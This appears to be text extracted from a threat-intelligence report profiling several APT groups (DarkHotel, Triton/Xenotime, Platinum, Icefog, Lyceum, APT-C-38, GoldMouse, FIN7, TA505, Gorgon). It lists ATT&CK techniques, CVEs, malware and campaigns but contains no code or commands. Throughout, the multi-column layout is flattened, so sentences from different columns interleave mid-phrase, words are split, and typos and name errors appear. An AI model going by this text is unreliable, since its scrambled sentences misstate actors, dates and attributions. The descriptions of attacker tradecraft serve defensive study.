T1194 - Spearphishing via Service Privilege Escalation T1113 - Screen Capture
T1195 - Supply Chain Compromise T1078 - Valid Accounts Command and Control
Execution Defense Evasion T1071 - S tandard Application Layer
T1064 - Scripting T1027 - Obfuscated Files or Information Protocol
T1106 - Execution through API T1045 - Software Packing
T1196 - Control Panel Items T1064 - Scripting
T1204 - User Execution T1078 - Valid Accounts
T1223 - Compiled HTML File T1223 - Compiled HTML File
T1196 - Control Panel Items
95
ATK52 Defense Espionage
DUBNIUM Cyber Terrorist
DARKHOTEL Government Agencies
59 Hacktivist
FALLOUT TEAM Military
KARBA State Sponsored Political Organizations
LUDER
NEMIM Unknown
PIONEER Language
SIG25 Korean
SHADOW CRANE
TAPAOUX
DESCRIPTION
DarkHotel is a Korean speaking attacker. diplomatic, defense and law enforcement. It certificate, a capacity do develop and use
While some have attributed this attacker to is especially active in the Sea of Japan and 0-days (especially around Flash Player). It
North Korea, notably due to the overlap the East China Sea. Its goal is espionage also has access to an extended network
between the group and ATK4, there is of specific individuals. infrastructure that is reliable, allowing
a consensus linking this threat actor to The group possesses extended cryptographic the group to maintain long-term access
South Korea instead. This actor targets knowledge, that allowed it to create fake to the system.
government entities, especially in the

DarkHotel None CVE-2015-5119 CVE-2014-0497
Nemim CVE-2016-4117 CVE-2010-0188
Tapaoux

Targeted
Countries _
China
Japan
North Korea
Russia
South Korea
Taiwan
South Korea
CAMPAIGNS
Jan-2007
Since at least 2007 - Precise attacks Attacks in 2015 - DarkHotel enhance 2007 Precise attacks in
hotels and wide
in hotels and wide spreading through its techniques spreading through
P2P networks
P2P networks In 2015, the group, while continuing to
The group gets its name from the fact that use its old techniques put more emphasis 2008
the group used hotel networks in order on malicious attachments, using HTA files
to infect its targets: The group waits for in order to infect its victims. The group also
the target to connect to the hotel's WiFi used RAR files, containing executable SCR
hotspot. Specific individuals will then be files using the RTLO technique to mask 2009
presented with a fake update asking the their extensions.

user to download a specific package. In April 2015, the group used a recently
This package is infected with a malware leaked Flash zero-day belonging to the
2010
that gathers information about its victims. “Hacking Team” group in order to infect
The group shows this fake update page new victims.
to specific people, and as the users
Attacks Since 2016 - New exploits
of the hotspot are identified by their 2011
room numbers, it shows that the group and Overlap with ATK4
somehow possesses inner knowledge on In April 2016, the DarkHotel group
the whereabouts of the clients. started using the CVE-2016-4117 and
hosting it on a compromised web server, 2012
Once the malware is deployed, it tries to
“scarcroft.net”. The attacker group ATK4
gain more significant knowledge about
started hosting some of its malware on
the machine it resides on, before deciding
that website too in late May 2016. While
to deploy its final stage.
it was first supposed that the two groups 2013
This extremely targeted attacks contrasts where the same, increasing the confusion
with another technique used by the group: on the attribution of the DarkHotel group,
infecting torrents with malware. This attack it is now clear that these attackers are
is specifically targeting Japanese users, as distinct, and that ATK4 might have been 2014
the names of the files suggest. monitoring DarkHotel.

The group also uses more traditional Another infrastructure overlap happened
techniques such as spear-phishing, specifically in 2018, when DarkHotel and ATK4 2015
May-2015
targeting the defense industry, NGOs and compromised the same victim. Attacks in 2015
governmental organizations. The group

In 2018, the group also used the zero-
was helped by two 0-days, now tracked as
day CVE-2018-8373, a vulnerability in Jan-2016
CVE-2010-0188 and CVE-2014-0497. 2016
Windows VBScript engine in order to attack New exploits and
The group has used valid certificates in Chinese trade executives. Overlap with ATK4
order to sign its malware. These certificates

The group is still active in 2019 and lead
are likely stolen or abused due to their
a campaign against political organizations 2017
weak cryptographic properties.
in North East Asia.
97
ATK52 Defense Espionage
DUBNIUM Cyber Terrorist
DARKHOTEL Government Agencies
59 Hacktivist
FALLOUT TEAM Military
KARBA State Sponsored Political Organizations
LUDER
NEMIM Unknown
PIONEER Language
SIG25 Korean
SHADOW CRANE
TAPAOUX

Targeted
Countries _
China
Japan
North Korea
Russia
South Korea
Taiwan
South Korea

T1091 - Replication Through Removable T1068 - Exploitation for Privilege Escalation T1016 - System Network Configuration
Media Discovery
Defense Evasion
T1189 - Drive-by Compromise T1057 - Process Discovery
T1193 - Spearp hishing Attachment T1063 - Security Software Discovery
Execution T1082 - System Information Discovery
T1140 - Deobfuscate/Decode Files or
T1064 - Scripting Information Lateral Movement
T1170 - Mshta T1064 - Scripting T1080 - Taint Shared Content
T1203 - Exploitation for Client Execution T1170 - Mshta T1091 - Replication Through Removable
T1204 - User Execution T1116 - Code Signing Media
Persistence Credential Access Collection
T1023 - Shortcut Modification T1056 - Input Capture T1056 - Input Capture
T1060 - Registry Run Keys / Startup Folder T1145 - Private Keys
99
TEMP.VELES Unknown
Cyber Terrorist
TRITON GROUP
59 XENOTIME Hacktivist
State Sponsored
Unknown
Language
Unknown
DESCRIPTION
TRITON is an attack framework allowing However, if we look at the sector targeted, denouncing the Iranian nuclear agreement
the manipulation of Security Systems namely oil, we must remember that since and the Gulf crisis of June 2017, which
Industrial Control Systems (ICS) of critical 2014 and the annexation of Crimea, increased tension between the Kingdom
infrastructures discovered at the end of pressure from the West on Russia has been and its Shiite alter ego, weakened relations
2017 when it has caused an accidental added to the fall in world oil prices, which between Russia and the Saudis. After
shutdown of the machines. FireEye has has plunged Russia into a recession. To the meeting of the two leaders and the
awarded the development of TRITON to a stimulate investment, the Kremlin had to attack on Saudi Arabia that paralyzed its
Muscovite research institute linked to the find capital and foreign exchange. oil company, Triton launched new attacks
Russian government. The attacker's tools For this reason, Russia has moved closer in 2018 in the Middle East region and
and TTPs indicate that he has prepared to to Saudi Arabia, whose alliance with the against the United States. Good relations
conduct operations that can last several United States had weakened under the between Saudi Arabia and Russia were
years and require a long preparation. In Obama era in the alder of the Iranian reconfirmed in the second week of June
the 2017 attack, the group compromised nuclear agreement, supported by the former 2018, when Saudi Arabia and Russia agreed
the target's network almost a year before US President. On 1 January 2017, the two to stabilize oil prices at an average level
reaching the SIS (Safety Instrument System). countries decided to reduce oil production of 75 dollars per barrel, while King Ben
During this period, priority seems to have volumes to 1.8 million barrels/day in order Salman and President Putin were meeting
been given to safety operational. His lack to increase the price of black gold. The in Moscow for opening the Football World
of “curiosity” during the operation may attack on Triton at the end of 2017 took Cup, which took place on the 14th.
indicate that the attacker is waiting for place 9 months later, when King Salman It should be noted that according to Dragos,
something before acting visibly. travelled to Moscow (November 2017) the Triton group (Xenotime) is undoubtedly
A particular international context to prepare for the next OPEC+ meeting, one of the most dangerous groups known
which was supposed to lead to a further to date since it attacks industrial security
This initial attack on Saudi interests by a
reduction in production after March 2018. systems almost exclusively with destructive
group whose origin appears to be Russian
Nevertheless, the last 9 months have been intent involving loss of human life.
is taking place in an unusual international
marked by two important events that have
context. It should be recalled that since
redefined everyone's interests.
the end of 2017, Russia and Saudi Arabia
have been moving closer together on the The change in US position in favour of
diplomatic front. Saudi Arabia during the Trump era by

Targeted
Countries _
Saudi Arabia
Russia
CAMPAIGNS TOOLS, MALWARES

AND VULNERABILITIES
Campaign leveraging the Triton 2017 Jan-2017
Campaign
malware leveraging the
Triton malware Malwares
In late 2017, an oil and gas facility in
Cryptcat
Saudi Arabia suffered down time due to
Triton/Trisis
infection by a malware strain that was
SecHack
able to interface with industrial control
systems in the facility. This malware was
targeting Schneider’s Triconex Safety Legitimate software
Instrumented System. It is believed that the
Mimikatz
group shut down the facility inadvertently,
Plink
as some controllers shut down themselves
when their logic code failed a validation
check. Such attack requires high technical Exploited vulnerabilities
knowledge and while the attack is probably None
not massively reproducible, it shows that
the attacker is capable enough to attack
2018
and potentially cause physical damages
to factories and industrial systems.
Some other intrusions took place at
undisclosed dates by this attacker in the
Middle East, focusing on oil and gas
companies until late 2018, were the group
also started probing energy systems in the
United-States, amongst other countries.
101
TEMP.VELES Unknown
Cyber Terrorist
TRITON GROUP
59 XENOTIME Hacktivist
State Sponsored
Unknown
Language
Unknown

Targeted
Countries _
Saudi Arabia
Russia

T1078 - Valid Accounts T1053 - Scheduled Task T1087 - Account Discovery
Execution T1078 - Valid Accounts T1135 - Network Share Discovery
T1053 - Scheduled Task T1100 - Web Shell Lateral Movement
T1183 - Image File Execution Options T1076 - Remote Desktop Protocol
Persistence Injection
T1053 - Scheduled Task Collection
Defense Evasion
T1078 - Valid Accounts T1119 - Automated Collection
T1100 - Web Shell Command and Control
T1183 - Image File Execution Options T1032 - Standard Cryptographic Protocol
Injection
T1099 - Timestomp
T1183 - Image File Execution Options
Injection T1065 - Uncommonly Used Port
Credential Access Exfiltration
T1003 - Credential Dumping T1022 - Data Encrypted
T1048 - E xfiltration Over Alternative
Protocol
103
ATK33 Cyber Criminal Communication & Objectives _
PLATINUM Defence Steal of intellectual
Cyber Terrorist
TWOFORONE properties
Financial Services
58 Hacktivist
Government Agencies
State Sponsored I nternational
Unknown Organizations
Military Language
Unknown
DESCRIPTION
PLATINUM is a cyber espionage group specific governmental organizations, defence custom developed tools which are often
active since at least 2009. Its activities are institutes, intelligence agencies, diplomatic updated to avoid detection. Its backdoors
distinctly different not only from those typically institutions, and telecommunication providers are configured to work during victim's
seen in untargeted attacks, but from many in South and Southeast Asia. The group’s working hours to hide network traffic
targeted attacks as well. A large share of persistent use of spear phishing tactics into the legitimate traffic. The group uses
targeted attacks can be characterized as (phishing attempts aimed at specific compromised infrastructure based in
opportunistic: the activity group changes individuals) and access to previously multiple countries. In June 2018, Kaspersky
its target profiles and attack geographies undiscovered zero-day exploits have made detected an ongoing campaign targeting
based on geopolitical seasons and may it a highly resilient threat. This group does diplomatic, government and military entities
attack institutions all over the world. Like not conduct many infections like as APT1 but conducted by PLATINUM. The group used
many such groups, PLATINUM seeks to focuses on a small number of campaigns a new steganography technique to hide
steal sensitive intellectual property related per year. He often targets private email their communication.
to government interests, but its range of accounts of its victims and use them to
preferred targets is consistently limited to access the organization networks. It uses
CAMPAIGNS 2012
Jan-2012
Platinum:
EasternRoppls
Platinum: EasternRoppls Campaign Campaign
EasternRoppels is a campaign that may have

started in 2012 targeting Communication,
Defence, Financial Services, Government
Agencies, International Organizations,
and Military sectors in Southeast Asia.
2013

Eadbupd None CVE-2015-2545 CVE-2013-1331
JPIN CVE-2013-7331 CVE-2015-2546
Dipsind
Hot patcher
ATMsol

Targeted
Countries _
China
India
Indonesia
Malaysia
South Asia
Southeast Asia
Unknown

T1189 - Drive-by Compromise T1055 - Process Injection T1056 - Input Capture
T1193 - Spearphishing Attachment T1068 - Exploitation for Privilege Escalation Command and Control
Execution T1179 - Hooking T1001 - Data Obfuscation
T1047 - W i n d o w s M a n a g e m e n t Defense Evasion T1094 - Custom Command and Control
Instrumentation T1036 - Masquerading Protocol
T1086 - PowerShell T1055 - Process Injection T1095 - Standard Non-Application Layer
T1204 - User Execution Credential Access Protocol
Persistence T1105 - Remote File Copy
T1179 - Hooking T1056 - Input Capture Exfiltration
T1179 - Hooking T1029 - Scheduled Transfer
Lateral Movement
105
DAGGER PANDA Defence Espionage
Cyber Terrorist
ICE FOG Government Agencies
Hacktivist
56 High-Tech
State Sponsored Maritime
Unknown
Language
Chinese
DESCRIPTION
Icefog is a Chinese cyber espionage group After the Kaspersky reports from September of the ICEFOG backdoor are used by
active since at least 2011. This group is 2013 and January 2014, the group multiple Chinese groups (APT9, APT15,
described by Kaspersky as “small, which disappeared. In 2015 after nearly a year Goblin Panda and another group name
a relative lack of complexity” but they of silence, new variants of the ICEFOG “Temp Group A” which can be the original
successfully compromised their targets which (ICEFOG-M and ICEFOF-P) have been Icefog group). The conclusion is that the
are mostly the defence contractors, industrial found, used during campaign which ICEFOG backdoor cannot be used to
companies, shipbuilding companies, targets do not match with previously seen attribute a campaign.
telecommunication operators and medias campaign. According to the researcher
in Japan, Taiwan and South Korea. Chi-en Shen from FireEye, the new variants
CAMPAIGNS Jan-2011
2011 Icefog campaign
Icefog campaign against Japan, Japan, South Korea and Taiwan. against Japan,
South Korea and
South Korea and Taiwan between NB: In 2014, Kaspersky published a report Taiwan between
2011 to 2013
2011 to 2013 on Icefog which prompted the attacker
In 2011 it targeted the Japanese House to develop new versions of the Malware.
of Representatives and the House of Nevertheless, these new versions have been
Councillors. used by other groups in many campaigns
During this period an APT campaign that and therefore cannot be linked to the 2012
focused on the supply chain, targeting original group since it is not necessarily
government institutions, military contractors, possible to determine whether it is the
maritime and ship-building groups has same group or another.
been also discovered. The group targeted
2013

ICEFOG CABARC CVE-2012-0158 CVE-2012-1856
JavaFog WinRAR CVE-2012-1723 CVE-2013-0422
MacFog

Targeted
Countries _
Japan
South Korea
Taiwan
China

T1192 - Spearphishing Link T1038 - DLL Search Order Hijacking T1043 - Commonly Used Port
T1193 - Spearphishing Attachment T1140 - Deobfuscate/Decode Files or T1065 - Uncommonly Used Port
Execution Information T1071 - Standard Application Layer
T1064 - Scripting Protocol
T1064 - Scripting
T1204 - User Execution Discovery Exfiltration
Persistence T1016 - System Network Configuration T1002 - Data Compressed
Discovery T1030 - Data Transfer Size Limits
Collection
T1005 - Data from Local System
107
HEXANE A
ttacks on industrial
Cyber Terrorist
LYCEUM security systems
Hacktivist almost exclusively with
55
destructive intent
State Sponsored
Unknown
Language
Unknown
DESCRIPTION
The ATK120 threat group (Lyceum, Hexane) on South African targets. In May 2019, 2019. Its target core is very similar to that
targets organizations in sectors of strategic the threat group launched a campaign of the APT Xenotime (ATK91), and some
national importance, including oil and against oil and gas organizations in the similirities can be found with Magnallium
gas and possibly telecommunications. Middle East. This campaign followed a and Chrysene. No definitive links can be
LYCEUM may have been active as early as sharp uptick in development and testing of established.
April 2018. Domain registrations suggest their toolkit against a public multi-vendor
that a campaign in mid-2018 focused malware scanning service in February

DanBot kl.ps1 None
A first-stage remote access trojan (RAT) that kl.ps1 is a custom keylogger that is written
uses DNS and HTTP-based communication in PowerShell and leverages elements of
mechanisms and provides basic remote the Microsoft .NET Core framework. It
access capability, including the abilities captures the window title and keystrokes
to execute arbitrary commands via cmd. on infected systems and stores them as
exe and to upload and download files. Base64-encoded data. It is deployed
DanBot is written in C# using .NET using a scheduled task and a VBScript file.
Framework 2.0 and provides basic remote Decrypt-RDCMan.ps1
access capabilities. The DNS channel
Decrypt-RDCMan.ps1 is a component of
of DanBot's C2 protocol uses both IPv4
the PoshC2 penetration testing framework.
A records and IPv6 AAAA records for
It is used to decrypt passwords stored in
communication. The HTTP channel has
the RDCMan configuration file, which
evolved slightly since the early 2018
stores details of servers and encrypted
samples but retains common elements
credentials to quickly establish remote
throughout.
desktop sessions. Recovered credentials
DanDrop could give the threat actors additional
ATK120 use this malicious macro to extract access within the environment. LYCEUM
the DanBot payload from the weaponized deployed this tool via DanBot approximately
document and then Base64-decode and one hour after gaining initial access to a
install the malware using a scheduled compromised environment.
task. The basic form and function of the
Get-LAPSP.ps1
macro have remained constant across
analyzed samples, but the threat actors Get-LAPSP.ps1 is a PowerShell script that
have made incremental improvements to gathers account information from Active
obfuscate the macro and refactor some Directory via LDAP. It appears to contain
of the functionality. borrowed code and has been run with
an obfuscation script such as invoke-
obfuscation. LYCEUM deployed this tool
via DanBot shortly after gaining initial
access to a compromised environment.

Targeted
Countries _
Africa
Central Asia
Kuwait
Middle East
South Africa
Unknown
CAMPAIGNS
ATK120 (Lyceum, Haxane) targets 2018
energy sector in South Africa

The Secureworks Counter Threat Unit Apr-2018
Research Team indicates that LYCEUM ATK120 (Lyceum
- Haxane) targets
may have been active as early as April energy sector in
2018. Domain registrations suggest that a South Africa
campaign in mid-2018 focused on South

African targets.
ATK120 (Lyceum, Hexane) targets
oil and gas companies in the Middle 2019
East.
In august 2019 ATK120 targeted oil and
gas companies in the Middle East, especially
Kuwait as a primary operating region.
However, ATK120's area of intervention Aug-2019
ATK120 (Lyceum -
extends to other regions as it has targeted Haxane) targets oil
telecommunications providers in the and gas companies
in the Middle East
Greater Middle East, Central Asia and
Africa, potentially as a steppingstone to
2020
network-focused man-in-the-middle and
related attacks.
109
HEXANE A
ttacks on industrial
Cyber Terrorist
LYCEUM security systems
Hacktivist almost exclusively with
55
destructive intent
State Sponsored
Unknown
Language
Unknown

Targeted
Countries _
Africa
Central Asia
Kuwait
Middle East
South Africa
Unknown
Discovery
Lateral Movement
T1076 - Remote Desktop Protocol
Collection
Command and Control
T1071 - S tandard Application Layer
Protocol
111
APT-C-38 Cyber Criminal Media & Objectives _
ATK112 Political Organizations Espionage
Cyber Terrorist
ZOOPARK
Hacktivist
54
State Sponsored
Unknown
Language
Unknown
DESCRIPTION
ATK112 is a group that mostly uses an software in order to accomplish its deeds, main vectors: Telegram channels and
Android Malware, “UnitMM”, which saw the group extended it and brought it watering holes. Indeed, it regularly uses
multiple iterations. This group was first to a fully-fledged espionage platform. compromised websites in order to gain
noticed in June 2015 and is still active According to 360 Beaconlab however, access its targets.
to this day. the group purchases its malicious software T h e g ro u p a l so st a rt e d u s in g a n
The group mostly focuses on espionage from a commercial development group, exclusive Windows malware, nicknamed
and has seen technical progresses since its nicknamed “Apasec”. “SpecialSaber”.
debuts: While it first used forked commercial The group deploys its tools through multiple
CAMPAIGNS
Jan-2015
APT-C-38 targets Middle East since 2015
APT-C-38 targets
2015 Middle East since
2015
Since 2015 APT-C-38 focuses on specific
geographic zones (in Middle East), as can
be seen from the theme of some infected
android application and the compromised
websites, notably:
The Iranian Kurdistan province (Infected
fake polling app)
Iraqi Kurdistan (Infected fake referendum)
Egypt (Compromised news website)
Lebanon and Jordan (Compromised
Arabic news website, especially popular
in these countries)
Kuwait (Compromised news website) 2016

SpecialSaber None None
UnitMM

Targeted
Countries _
Egypt Kurdistan
Iran Lebanon
Iraq M
iddle
Jordan East
Kuwait Morocco
Unknown
Defense Evasion T1074 - Data Staged

T1089 - Disabling Security Tools Command and Control
Credential Access T1043 - Commonly Used Port
T1056 - Input Capture Exfiltration
T1003 - Credential Dumping T1022 - Data Encrypted
Discovery T1041 -Exfiltration Over Command and
T1057 - Process Discovery Control Channel
Collection
113
APT-C-27 Cyber Criminal Unknown & Objectives _
ATK80 Espionage
Cyber Terrorist
GOLDMOUSE
GOLDEN RAT Hacktivist
52
State Sponsored
Unknown
Language
Unknown
DESCRIPTION
ATK80 (APT-C-27, GoldMouse or Golden These capabilities allow the attacker to The characteristics of the group seem to
Rat) is a threat actor active since at least efficiently track a person. indicate a match of interests:
November 2014. It launched targeted Focus on the international context First, the start dates of the group
long-term attacks against organizations activities are evocative. November 2014
There are several indications that this group
in the Syrian region using Android and corresponds to a period when DAESH's
linked to Iran is serving the international
Windows malwares. Its objective is the dangerous nature for President Bashar
interests of the Shia Islamic Republic.
theft of sensitive information. Its malwares Al-Assad's power strengthening enterprise
are mainly disguised as common chat It should be recalled that Iran, in a context
is confirmed. Countering DAESH and the
software such as ChatSecure or WhatsApp of Cold War with Saudi Arabia, has been
rebels makes it possible to consolidate
or Telegram. It also uses the njRat, an involved in the Syrian conflict (as have
the Shiite hold on the country, especially
open-source Remote Access Trojan created many other countries). By supporting the
when we know that until June 2015 the
in 2012 and often used against targets power of President Bashar Al-Assad, the
Syrian regime suffered several military
in the Middle East. Republic of Ayatollah wishes to consolidate
failures. In addition, on 7 October
the Shia arc that connects Iran to the
The initial access techniques include the 2015, General Hossein Hamadani, a
Mediterranean Sea through Iraq, Alawi
conception of fake websites helped by very influential among the guards of the
Syria (Shia branch) and Lebanon through
typosquatting used to lead the user to Islamic revolution, was killed by Daesh
Hezbollah.
download the malicious messaging app. according to the Iranian government.
The group also used social media like Secondly, the modus operandi of prioritizing
Facebook to induce users to download the the infiltration of messaging applications
malicious software from a specified link. known to be used by both terrorists
Its Android spyware has the ability of and rebels constitutes a second set of
recording, photographing, GPS positioning, objectives. It is a question of espionage
uploading contacts/call records/sms/ on the opponents in power of the Syrian
files, executing cloud commands, etc. President.
CAMPAIGNS Oct-2014
Attacks against
This group attacks in waves: March 2019 - The group started 2014
Syria using njRat
to use the WinRAR vulnerability and Downloader

October 2014 - July 2015 - Attacks plus AndroRAT for Jul-2015
(CVE-2018-20250) to install an 2015 Android devices Attacks using
against Syria using njRat and DarkComet,
embedded njRat on a vulnerable
Downloader plus AndroRAT for
VBS Backdoor,
computer. 2016
AndroRAT and
Android devices Dec-2016 multiple types of
payloads
The language used in the malwares and Attacks using a
July 2015 - November 2016 - in the lure documents is Arabic. The lure 2017
custom Android
RAT, a custom
Attacks using DarkComet, VBS documents are about terrorist attacks, a Windows RAT,
a JavaScript
Backdoor, AndroRAT and multiple sensible subject in the Middle East region 2018
Backdoor
types of payloads and other theme that can easily lead to

user curiosity.
December 2016 - July 2018 - 2019 Mar-2019
Attacks using a custom Android The group started

to use the WinRAR
RAT, a custom Windows RAT, a 2020
vulnerability
JavaScript Backdoor

Android RAT njRat None CVE-2018-20250
DarkComet VBS Backdoor
JS Backdoor Windows RAT

Targeted
Countries _
Middle East
Syria
Iran

T1192 - Spearphishing Link T1107 - File Deletion T1065 - Uncommonly Used Port
T1193 - Spearphishing Attachment T1102 - Web Service T1071 - Standard Application Layer
T1194 - Spearphishing via Service T1045 - Software Packing Protocol
Execution T1112 - Modify Registry T1102 - Web Service
T1204 - User Execution T1140 - Deobfuscate/Decode Files or Exfiltration
Information
Collection
Mobile ATTACK
T1476 - Deliver Malicious App via Other Means
T1401 - Abuse Device Administrator Access to Prevent Removal
T1437 - Standard Application Layer Protocol
T1412 - Capture SMS Messages
T1430 - Location Tracking
T1432 - Access Contact List
T1429 - Microphone or Camera Recordings
T1481 - Web Service
T1433 - Access Call Log
115
ATK32 Cyber Criminal Casino & Gaming & Objectives _
CARBANAK (?) Communication Personal-gain
Cyber Terrorist
FIN7 Education
AG-CR1 Hacktivist Energy
52 Financial Services
State Sponsored
High-Tech
Unknown
Hospitality
Language
Retail
Unknown
DESCRIPTION
FIN7 is a financially motivated group tracked separately. Its main goal is to phishing campaigns. In addition, the group
that is active since at least 2013, which steal financial assets from companies, used a front company dubbed “Combi
primarily targets the retail, hospitality such as debit cards, or to get access to Security”, purportedly headquartered in
and restaurant sectors, mainly in the U.S. financial data or computers of finance Russia and Israel, to provide a guise of
There are assumptions that this is the department employees in order to conduct legitimacy and to recruit hackers to join
same group as Carbanak, but it appears wire transfers to offshore accounts. The the criminal enterprise.
that these are two separate groups using group’s often use phishing as their main
similar tools, and therefore are currently attack vector, including tailored spear-

Custom tools Tools used by multiple adversaries Microsoft Office
alfBaked
H arbanak
C Exploited vulnerabilities
PowerSource veMaria
A VE-2017-11882
C
TextMate
SQLRat
C obalt Strike
DNSbot
T inyMe
Bateleur

Targeted
Countries _
Australia
France
Malta
United Kingdom
United States
Russia
CAMPAIGNS
February 2017 - US-SEC filings October2017 - Banks and Enterprises 2017
The group carried out a campaign targeting Another campaign took place between
Feb-2017
United States Securities and Exchange October 8-10, 2017, targeting banks US-SEC filings
Commission (SEC) filings at various and enterprises. Like previous campaigns, Mar-2017
Fileless malware
organizations. The campaign used spear- this attack also bypassed most security Apr-2017 campaigns
phishing methods against personnel solutions. Hidden Shortcut
Files
involved with the US-SEC filings.
2018 - High Profile Breaches
Jun-2017
March 2017 - Fileless Malware A campaign by the group was identified, Evasive Restaurant
Campaigns breaching several High-profile American campaign
The group was associated with two campaigns companies. Reportedly over five million 2017
Carbanak
targeting financial institutions, government credit and debit card numbers were Oct-2017
agencies and other enterprises. The affected by the breach. Bank and
enterprises
campaigns used fileless malware and
November 2018
known penetration testing tools and utilities.
Two new campaigns were identified in the 2018
2018
April 2017 - Hidden Shortcut Files first two weeks of November 2018. The High Profile
In a new campaign, the group modified attacks resembled previous campaigns by Breaches
their phishing techniques, initiating the group but included small variations in
the infection using phishing lures that order to bypass security vendors.
implemented hidden shortcut (LNK) files
March 2019
to avoid detection. The attack then used
VBScript to infect the victim. This method After the arrest of suspected high-ranking
replaced the previous use of weaponized members of the group in August 2018, the
Microsoft Office macros. group resumed its activities with a new set
of administrator tools and never-before-
June 2017 - Evasive Restaurant seen forms of malware. This campaign
Campaign included phishing emails with malicious
Nov-2018
A sophisticated fileless attack was identified attachments, containing SQLRat. This
Two new
on June 7, 2017, targeting restaurants technique has not been seen before in campaigns
Fin7 tactics. 2019
across the US, seizing system control and
installing a backdoor to steal financial Mar-2019
information. The campaign incorporated The group resumed
its activities with
new evasion techniques, bypassing both a new set of
signature- and behavior-based security administrator tools
and never-before-
mechanisms. seen forms of
malware
2017 - Carbanak
Attacks carried out by the group were
found to install the CARBANAK backdoor
for persistent access. The attacks leveraged
an application shim database to inject
a malicious in-memory patch into the
“services.exe” process, and then spawn
a CARBANAK backdoor process. 2020
117
CARBANAK (?) Communication Personal-gain
Cyber Terrorist
FIN7 Education
AG-CR1 Hacktivist Energy
52 Financial Services
State Sponsored
High-Tech
Unknown
Retail Unknown

Targeted
Countries _
Australia
France
Malta
United Kingdom
United States
Russia
Initial Access Persistence Defense Evasion

T1193 - Spearphishing Attachment T1023 - Shortcut Modification T1036 - Masquerading
Execution T1050 - New Service T1064 - Scripting
T1053 - Scheduled Task T1060 - Registry Run Keys / Startup Folder T1102 - Web Service
T1059 - Command-Line Interface T1053 - Scheduled Task T1116 - Code Signing
T1064 - Scripting T1138 - Application Shimming T1170 - Mshta
T1086 - PowerShell Privilege Escalation Collection
T1170 - Mshta T1050 - New Service T1113 - Screen Capture
T1204 - User Execution T1053 - Scheduled Task Command and Control
T1138 - Application Shimming T1043 - Commonly Used Port
T1102 - Web Service
119
ATK103 Cyber Criminal Financial Services & Objectives _
TA505 Financial Gain
Cyber Terrorist
Hacktivist
50 State Sponsored
Unknown
Language
Russian
DESCRIPTION
The Threat Actor 505 (ATK103, TA505) is motivated by financial gains. It is hightly attacks. In July 2018, ATK103 has been
active since at least 2014. It is a significant adaptable, often change its malwares and seen using the SettingContent-ms files in
part of the email threat landscape and techniques, use off-the-shelf malwares their decoy documents. This technique
is responsible for the largest malicious and operate on a massive scale. It doesn't has been described by Matt N. and in
spam campaigns Proofpoint have ever seem to be trying to stay stealthy. Since early June 2018, MSRC responded with a
observed, distributing instances of the March 2018, ATK103 was observed using note that the severity of the issue is below
Dridex banking trojan, Locky ransomware, FlawedAmmyy RAT, a variant of the leaked the bar for servicing and that the case
Jaff ransomware, the Trick banking trojan, AmmyyAdmin 3 (Remote Administration will be closed. Some of these malwares
and several others in very high volumes. Tool). The use of these tools can make us were signed with a COMODO SECURE
ATK103 use Necurs botnet to drive massive think that this actor wants to switch from certificate. ATK103 seems to be a Russian
spam campaigns. ATK103 seems to be big spam campaigns to more targeted speaking group.

Amadey Necurs None
Bart
Dridex
FlawedAmmyy
FlawedGrace
GlobeImposter
Jaff
Locky
Philadelphia
ServHelper
TrickBot

Targeted
Countries _
Chile S
outh America
China S
outh Korea
E
astern Asia S
outheastern
Italy Asia
Mexico Taiwan
N
orth America Western Europe
Unknown
CAMPAIGNS
TA505 impersonates Airlines New campaign of the Russian group 2017
Date: 25/07/2019 TA505 directed to Chile andArgentina.

Targets: South Korea, Eastern Asia Date: 22/04/2019
Tool: Flawedammyy Targets: Chile, Argentina, South America

Tool: Servhelper Jun-2017
TA05 using new malware Gelup TrickBot spread
and Flowerpipi TA505 targets the US retail industry by Necurs Botnet
adds Nordic
Date: 04/07/2019 with personalized attachments Countries to its
Targets Aug-2017
Targets: Argentina, Philippines, Japan, Date: 06/12/2018
Locky Campaign
South America, Eastern Asia, Philippines Targets: United-States, Retail new invoice
Tools: Flowerpipi, Gelup Tool: N/A

Nov-2017
Breaking Down TA505 Groups Use G l o b e i m p o s t e r R a n s o m wa r e Globeimposter
of HTML and RATs Campaign Ransomware
Campaign
2018
Date: 12/06/2019 Date: 30/11/2017 - 20/12/2017
Targets: Taiwan, Mexico, Italy, South Targets: Classical targets
Korea, China, Chile Tool: Globeimposter
Tools: RATs
Locky campaign New invoice
Malicious documents spreading Date: 28/08/2017
Ransomware Targets: Classical targets
Date: 29/05/2019
Tool: Locky
Targets: South Korea, North Korea,
Eastern Asia TrickBot spread by Necurs Botnet,
Tools: Ammyy, Clop Adds Nordic Countries to its Targets
Date: 09/06/2017
Dec-2018
TA505 is Expanding its Operations
Targets: Nordic Countries TA505 targets the
Date: 29/05/2019 US retail industry
Tools: TrickBot, Necurs 2019
with personnalized
Targets: Italy, Western Europe attachments
Tool: N/A
Apr-2019
New campaign of
the Russian group
TA505 directed to
May-2019 Chile and Argentina
May-2019
TA505 is Malicious
Expanding its documents
Operations Jun-2019 spreading
Ransomware
Breaking down
Jul-2019 Jul-2019 TA505 Group use
TA505 TA505 using new of HTML and RATs
impersonates malware Gelup and
Airlines Flowerpipi
2020
121
ATK103 Cyber Criminal Financial Services & Objectives _
TA505 Financial Gain
Cyber Terrorist
Hacktivist
50 State Sponsored
Unknown
Language
Russian

Targeted
Countries _
Chile S
outh America
China S
outh Korea
E
astern Asia S
outheastern
Italy Asia
Mexico Taiwan
N
orth America Western Europe
Unknown

T1192 - Spearphishing Link T1027 - Obfuscated Files or Information T1105 - Remote File Copy
T1193 - Spearphishing Attachment T1064 - Scripting Command and Control
Execution T1085 - Rundll32 T1105 - Remote File Copy
T1116 - Code Signing
T1064 - Scripting Impact
T1085 - Rundll32 T1218 - Signed Binary Proxy Execution
T1486 - Data Encrypted for Impact
T1086 - PowerShell Credential Access
T1173 - Dynamic Data Exchange T1081 - Credentials in Files
T1204 - User Execution
T1218 - Signed Binary Proxy Execution
123
ATK 92 Cyber Criminal Government Agencies & Objectives _
GORGON GROUP Organizational-gain
Cyber Terrorist
SUBAAT
TAG-CR5 Hacktivist
48 State Sponsored
Unknown
Language
Urdu
DESCRIPTION
Gorgon Group is engaged both in cyber organizations. The group is active since targeted government organizations in
criminal attacks as well as targeted 2017 and is believed to be operating the United Kingdom, Spain, Russia, and
attacks against worldwide governmental from Pakistan. The group’s campaigns the United States.
CAMPAIGNS
July 2017 - Phishing campaign Kingdom, Spain, Russia, and the United 2017
targeting a US-based government States. In addition, at the same time,
organization. members of Gorgon Group also attacked
During the campaign, the threat actors targets in criminal operations across the
